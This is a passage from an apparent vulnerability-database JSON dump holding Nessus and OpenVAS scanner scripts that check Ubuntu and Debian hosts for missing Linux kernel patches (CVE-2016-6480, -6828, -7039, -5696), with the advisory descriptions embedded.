"bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-raspi2"], "id": "UBUNTU_USN-3099-3.NASL", "href": "https://www.tenable.com/plugins/nessus/93958", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3099-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93958);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n script_xref(name:\"USN\", value:\"3099-3\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-raspi2 vulnerabilities (USN-3099-3)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3099-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-4.4-raspi2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3099-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1027-raspi2\", pkgver:\"4.4.0-1027.33\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-raspi2\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-03-01T07:31:26", "description": "Vladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-11T00:00:00", "title": "Ubuntu 16.04 LTS : linux-snapdragon vulnerabilities (USN-3099-4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-snapdragon"], "id": "UBUNTU_USN-3099-4.NASL", "href": "https://www.tenable.com/plugins/nessus/93959", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3099-4. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93959);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n script_xref(name:\"USN\", value:\"3099-4\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-snapdragon vulnerabilities (USN-3099-4)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3099-4/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-4.4-snapdragon package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3099-4\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1030-snapdragon\", pkgver:\"4.4.0-1030.33\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-snapdragon\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-03-01T07:31:26", "description": "USN-3099-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nVladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-11T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-xenial vulnerabilities (USN-3099-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3099-2.NASL", "href": "https://www.tenable.com/plugins/nessus/93957", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3099-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93957);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n script_xref(name:\"USN\", value:\"3099-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial vulnerabilities (USN-3099-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3099-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nVladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3099-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.4-generic,\nlinux-image-4.4-generic-lpae and / or linux-image-4.4-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3099-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-42-generic\", pkgver:\"4.4.0-42.62~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-42-generic-lpae\", pkgver:\"4.4.0-42.62~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-42-lowlatency\", pkgver:\"4.4.0-42.62~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-generic / linux-image-4.4-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:54:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-5696", "CVE-2016-6136", "CVE-2016-6828"], "description": "Several vulnerabilities have been\n discovered in the Linux kernel that may lead to a privilege escalation,\n denial of service or have other impacts.\n\nCVE-2016-5696 \nYue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\nKrishnamurthy of the University of California, Riverside; and Lisa\nM. Marvel of the United States Army Research Laboratory discovered\nthat Linux", "modified": "2017-07-07T00:00:00", "published": "2016-09-04T00:00:00", "id": "OPENVAS:703659", "href": "http://plugins.openvas.org/nasl.php?oid=703659", "type": "openvas", "title": "Debian Security Advisory DSA 3659-1 (linux - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3659.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3659-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703659);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-5696\", \"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\");\n script_name(\"Debian Security Advisory DSA 3659-1 (linux - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-09-04 00:00:00 +0200 (Sun, 04 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3659.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"linux on Debian Linux\");\n script_tag(name: \"insight\", value: \"The Linux kernel is the core of the Linux operating system.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\n these problems have been fixed in version 3.16.36-1+deb8u1. In addition, this\n update contains several changes originally targeted for the upcoming jessie\n point release.\n\n We recommend that you upgrade your linux packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\n discovered in the Linux kernel that may lead to a privilege escalation,\n denial of service or have other impacts.\n\nCVE-2016-5696 \nYue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\nKrishnamurthy of the University of California, Riverside; and Lisa\nM. Marvel of the United States Army Research Laboratory discovered\nthat Linux's implementation of the TCP Challenge ACK feature\nresults in a side channel that can be used to find TCP connections\nbetween specific IP addresses, and to inject messages into those\nconnections.\n\nWhere a service is made available through TCP, this may allow\nremote attackers to impersonate another connected user to the\nserver or to impersonate the server to another connected user. In\ncase the service uses a protocol with message authentication\n(e.g. TLS or SSH), this vulnerability only allows denial of\nservice (connection failure). An attack takes tens of seconds, so\nshort-lived TCP connections are also unlikely to be vulnerable.\n\nThis may be mitigated by increasing the rate limit for TCP\nChallenge ACKs so that it is never exceeded:\nsysctl net.ipv4.tcp_challenge_ack_limit=1000000000\n\nCVE-2016-6136Pengfei Wang discovered that the audit subsystem has a\n'double-fetch' or TOCTTOU \nbug in its handling of special\ncharacters in the name of an executable. Where audit logging of\nexecve() is enabled, this allows a local user to generate\nmisleading log messages.\n\nCVE-2016-6480Pengfei Wang discovered that the aacraid driver for Adaptec RAID\ncontrollers has a 'double-fetch' or TOCTTOU bug in its\nvalidation of FIB \nmessages passed through the ioctl() system\ncall. This has no practical security impact in current Debian\nreleases.\n\nCVE-2016-6828 \nMarco Grassi reported a 'use-after-free' bug in the TCP\nimplementation, which can be triggered by local users. The\nsecurity impact is unclear, but might include denial of service or\nprivilege escalation.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\n\nif ((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-arm\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-s390\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-x86\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-3.16\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-586\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-686-pae\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-amd64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-arm64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armel\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armhf\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-i386\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mips\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mipsel\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-powerpc\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-ppc64el\", ver:\"3.16.36-1+deb8u1\", 